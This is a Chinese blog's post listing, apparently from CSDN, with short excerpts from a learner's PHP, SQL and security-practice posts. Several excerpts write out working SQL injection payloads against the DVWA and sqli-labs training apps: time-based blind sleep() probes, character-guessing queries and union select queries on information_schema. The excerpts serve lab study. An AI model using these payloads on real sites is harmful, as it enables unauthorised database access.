- 博客(28)
- 收藏
- 关注
原创 sql注入之 读文件 写文件 带外 二次注入 堆叠注入
二次解码注入url编码 在前面加上%比如\ 它的ascii码是92 那么92对应的16进制是5c 所以它的url是%5cphp解码函数 urlcode() rawurlcode()默认的GET和POST请求 ,php会先解码一次例如 admin’ –> admin%27 -> admin%2527 -> admin %27 -> (转移函数) -&...
2020-02-10 18:36:36 569
原创 sql sqli-labs 1-20
1' and sleep(10) -- -1' and if(length(database())=4,1,1=2) -- -1' and if((ascii(substr(database(),1,1)))=100,1,2=1) -- -1 and sleep(10) -- -抓包1 and if(length(database())=4,1,1=2)1 and if((asci...
2020-01-07 22:24:04 181
原创 sql注入 dvwa 盲注
1' and sleep(10) -- -1' and if(length(database())=4,1,1=2) -- -1' and if((ascii(substr(database(),1,1)))=100,1,2=1) -- -1 and sleep(10) -- -抓包1 and if(length(database())=4,1,1=2)1 and if((asci...
2020-01-07 22:23:30 142
原创 sql爆破
1' and 2=1 union select 1,database() -- -1000' union select 1,(select group_concat(table_name) from information_schema.talbes where table_schema='dvwa') -- -1000' union select 1,(select group_...
2020-01-06 22:49:51 397
原创 BurpUnlimited 工具的使用
proxy使用repeter模块intruder模块选取要爆破的模块长度可以看出密码是123爆破目录spider 模块scanner模块comparer模块
2020-01-02 19:55:16 3819
原创 ctf学习-新手QR_code篇
拿到之后是一张图片对文件进行修改后缀名 .zip发现是个包 里面有个.txt用暴力破解软件进行破解里面就是答案了
2019-12-30 22:19:30 2092
转载 问题总结
HTTP协议和HTTPS协议的异同点超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息,HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息,因此,HTTP协议不适合传输一些敏感信息,比如:信用卡号、密码等支付信息。 为了解决HTTP协议的这一缺陷,需要使用另一种协议:安全套接字层超...
2019-12-30 21:23:26 108
原创 php 函数参数不同的时候完成不同的操作
涉及到两个函数1.func_num_args— 返回传入函数的参数总个数func_num_args(); 2.func_get_arg — 根据参数索引从参数列表返回参数值func_get_arg();<?phpfunction li(){ echo func_num_args(); if(func_num_args()==3) { ...
2019-12-24 10:56:03 372
原创 sql简单联合查询
查询所有成绩平均分select avg(degree) from Score;查询每个人的平均分是多少:select avg(degree),sno from Score group by Sno;查询有多少个成绩select count(degree)from Score;...
2019-12-19 20:47:02 96
原创 通过ajax在html中post方式提交
<?php//将获取的留言存放到message.txt里$message=$_POST["message"];$f=fopen("message.txt","a");fwrite($f,$message);$data = ["data"=>"chenggong"];$data1 = ["data"=>"shibai"];// 如果结果是false 返回失败/...
2019-12-18 21:54:36 455
原创 通过ajax在html中利用post方式进行提交数据 将数据存储到message.txt
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</title></head><body><textarea name="" id="tao" cols="30" rows...
2019-12-18 21:39:57 693
原创 通过ajax在html 中显示message.txt 中的内容
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</title></head><!--要求通过ajax技术请求a.php最终将message.txt写入div中--><...
2019-12-18 21:22:52 483
原创 简易留言板
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</title></head><body><?php$file = "message.txt";$f = fopen($...
2019-12-18 09:16:04 112
原创 通过session实现自动登录
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</title></head><body><form action="sseion.php" method="post"&g...
2019-12-17 21:34:49 554
原创 通过cookie实现自动登录
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</title></head><body><form action="cookie.php" method="post"&g...
2019-12-17 21:33:08 199 1
原创 php 常用数组函数
//返回当前元素键名和键值while(each($a1)) { var_dump(each($a1));}//用于在一次操作中给一组变量赋值$arr=array("abc","abc","abc");list($a,$b,$c)=$arr;$num=345;var_dump(str_split($num));$a2= array_reverse(str_split($...
2019-12-11 17:39:50 74
原创 字符串函数
<?php//替换字符串的一部分$palce="abc.com";//分大小写echo str_replace("abc","baidu",$palce);echo "<br/>";//不分大小写echo str_ireplace("CoM","net",$palce);echo "<br/>";//分割字符串到数组中$sp="123456";...
2019-12-10 17:57:00 52
原创 根据页面的行数,生成一个不同颜色的页面
<?php //?><!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</title></head><body><?php for($i=1;$i&l...
2019-12-10 00:02:41 98
原创 使用php输出 that's ok的三种方法
<?phpecho "that's ok";echo "<br />";echo 'that\'s ok';echo "<br />";echo <<<EOF "that's ok"EOF;
2019-12-09 23:36:58 145
原创 设置php能够连接mongodb
先下载对应版本的dll文件http://pecl.php.net/package/mongodb下载好后放到这个C:\phpStudy\PHPTutorial\php\php-5.5.38\ext(对应版本)然后配置对应版本的php配置文件添加一行代码extension=php_mongodb.dll重启apache完成...
2019-12-09 23:28:22 180
原创 完成apache服务器能够使用php解析.phtml .php3
在C:\phpStudy\PHPTutorial\Apache\路径下 修改httpd.conf 文件将第403行代码去掉注释 即可
2019-12-09 23:20:58 160
原创 使用PHP来编写一个页面,页面内容显示出浏览器的信息。包括浏览器信息,系统信息,文件位置信息,PHP版本,文件行数。
使用PHP来编写一个页面,页面内容显示出浏览器的信息。包括浏览器信息,系统信息,文件位置信息,PHP版本,文件行数。代码如下<?php ?><!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Title</...
2019-12-09 23:00:01 158
原创 win和linux基本指令
WIN部分:基本指令cd /d d: 进入上次d盘所在的目录cd /d d:\ 进入d盘根目录cd prj\src\view 进入当前目录下的prj\src\view文件夹dir显示目录内容dir /ad显示目录的子文件夹dir /a-d 显示目录的文件ren (rename) 重命名ren 1.txt 2.txt 将当前目录下的1.txt文...
2019-12-03 13:35:17 149 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人